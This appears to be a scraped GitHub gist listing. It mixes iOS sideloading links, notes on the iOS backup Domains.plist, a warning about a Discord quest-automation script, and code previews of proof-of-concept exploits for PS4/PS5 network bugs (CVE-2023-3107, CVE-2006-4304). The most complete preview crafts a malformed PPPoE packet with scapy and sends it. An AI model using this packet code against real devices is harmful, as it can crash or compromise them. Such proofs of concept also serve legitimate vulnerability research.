- Visit fmhy.net/android-iosguide#ios-ipas for more sources.
- Sideloading Guide: https://rentry.co/sideloadingguide, https://ios.cfw.guide/sideloading-apps/
ongkiii
/ IPA-Sources.md
Last active
April 13, 2026 18:43
REPOS/TELEGRAM CHANNELS LIST BY u/angkitbharadwaj
leminlimez
/ Domains.md
Last active
March 31, 2026 06:07
A deep dive into the iOS backup/restore system
Documentation of /System/Library/Backup/Domains.plist. File taken from iOS 16.4 iPhone SE 3. The file was removed in iOS 17.0
Values in the plist. Other than SystemDomains, these are not really important and are just here for preservation sake.
A domain in domains.plist contains keys that determine what gets backed up for what types of devices and where (i.e. iCloud vs iTunes). Not all domains have each key. The only 2 keys that must be in every domain are RootPath and RelativePathsToBackupAndRestore. Some domains have the value ShouldDigest. I am not sure exactly what it means but I have included it for documentation purposes.
Version:"24.0"SystemDomains:(Dictionary), see below
Caution
As of April 7th 2026, Discord has expressed their intent to crack down on automating quest completion.
Some users have received the following system message:
There isn't much I can do to make the script undetected, so use it at your own risk, as you most likely WILL get flagged by doing so.
lewiwiii
/ PoC of CVE-2023-3107 for PS4.py
Last active
April 10, 2024 10:41
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # This software is licensed under the GNU Affero General Public License (AGPL) version 3.0 or later. | |
| # For more details, see <https://www.gnu.org/licenses/agpl-3.0.html>. | |
| from scapy import all as sp | |
| import sys | |
| import random as rn | |
| iface = sys.argv[1] | |
| src_mac = sp.get_if_hwaddr(iface) |
iMrDJAi
/ CVE-2006-4304.py
Last active
July 16, 2025 01:15
My implementation of a proof of concept for the `CVE-2006-4304` sppp driver vulnerability that affected PS4/PS5 and earlier versions of FreeBSD/NetBSD
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| from scapy.all import sniff, sendp | |
| from socket import * | |
| import time | |
| # Replace with your PS4/5's MAC address. | |
| dst_mac=b'\xaa\xbb\xcc\xdd\xee\xff' | |
| # Replacing source MAC address is not mandatory | |
| src_mac= b'\xab\xcd\xef\xab\xcd\xef' | |
| # Replace this with your computer's ethernet interface name | |
| iface_name = 'Ethernet' |
RobbedColek
/ PS4-PS5-CVE-2006-4304.py
Created
January 30, 2024 16:02
PoC of CVE-2006-4304 for PS4/PS5
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| from scapy.all import PPPoED, Ether, sniff, sendp, srp1, hexdump | |
| source = b"\xXX\xXX\xXX\xXX\xXX\xXX" # MAC address of your adapter on PC | |
| destination = b"\xXX\xXX\xXX\xXX\xXX\xXX" # MAC address of LAN on your PS4 | |
| interface = "Realtek PCIe 2.5GbE Family Controller #2" # get via "ipconfig /all" or eth0 or similiar on Linux | |
| packet = sniff(iface=interface, filter="pppoed", count=1) | |
| tag_value = packet[PPPoED][0].tag_list[1].tag_value | |
| payload = destination + source + b"\x88\x63\x11\x07\x00\x00\x00\x0c\x01\x03\x00\x08" + tag_value | |
| sendp(payload, iface=interface) |